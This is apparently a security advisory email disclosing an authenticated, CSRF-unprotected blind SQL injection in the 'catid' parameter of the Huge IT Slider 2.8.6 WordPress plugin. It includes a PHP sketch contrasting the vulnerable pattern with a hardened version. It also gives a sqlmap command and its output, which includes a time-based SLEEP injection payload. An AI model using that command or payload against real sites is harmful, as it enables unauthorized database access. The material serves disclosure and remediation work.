Subject: Blind SQL injection in Huge IT Slider 2.8.6
Date: Wed, 22 Jul 2015 17:00:04 +0200

Hello,

Plugin: Huge IT Slider 2.8.6 https://wordpress.org/plugins/slider-image/

Authenticated users (such as editors) can execute arbitrary SQL queries, and the request carries no CSRF protection.

1. SQL injection (showslider())

Method: GET
Url: http://localhost/wp-admin/admin.php?page=sliders_huge_it_slider&catid=1
Vulnerable parameter: catid

Example PHP callstack:
sliders_huge_it_slider   [/slider-image/slider.php:517]
showslider   [/slider-image/sliders.php:96]
wpdb::get_var
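
Illustration of the pattern the callstack implies, beside a hardened version (added here for this write-up; this is not the plugin's actual code, and the table name, column name and query shape are assumptions):

```php
<?php
// Added illustration, not code from the Huge IT Slider plugin.
// Table name, column names and the shape of the query are assumptions.

// Vulnerable pattern implied by the callstack: the catid GET parameter is
// concatenated straight into the SQL string and handed to $wpdb->get_var(),
// so any SQL appended to catid reaches MySQL unchanged.
function showslider_vulnerable() {
    global $wpdb;
    $catid = $_GET['catid'];
    return $wpdb->get_var(
        "SELECT name FROM " . $wpdb->prefix . "huge_itslider_sliders WHERE id=" . $catid
    );
}

// Hardened version: capability check, nonce check (closes the missing CSRF
// protection), integer coercion and a prepared statement.
function showslider_hardened() {
    global $wpdb;

    // Only users allowed to manage the plugin may reach this code path.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }

    // Verifies the _wpnonce field; the admin link must be built with
    // wp_nonce_url( $url, 'huge_it_slider_show' ) for this to pass.
    check_admin_referer( 'huge_it_slider_show' );

    // absint() coerces to a non-negative integer, so catid can never carry SQL.
    $catid = isset( $_GET['catid'] ) ? absint( $_GET['catid'] ) : 0;
    if ( 0 === $catid ) {
        return null;
    }

    // The table name comes from the trusted prefix; the user value is bound
    // through prepare() with a %d placeholder instead of string concatenation.
    $table = $wpdb->prefix . 'huge_itslider_sliders';
    return $wpdb->get_var(
        $wpdb->prepare( "SELECT name FROM {$table} WHERE id = %d", $catid )
    );
}
```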

Verification:
sqlmap --cookie "..." --dbms mysql -u "http://localhost/wp-admin/admin.php?page=sliders_huge_it_slider&catid=1" -p catid

...
Parameter: catid (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=sliders_huge_it_slider&catid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))aHzR)
...


--
Regards,
Marcin Probola,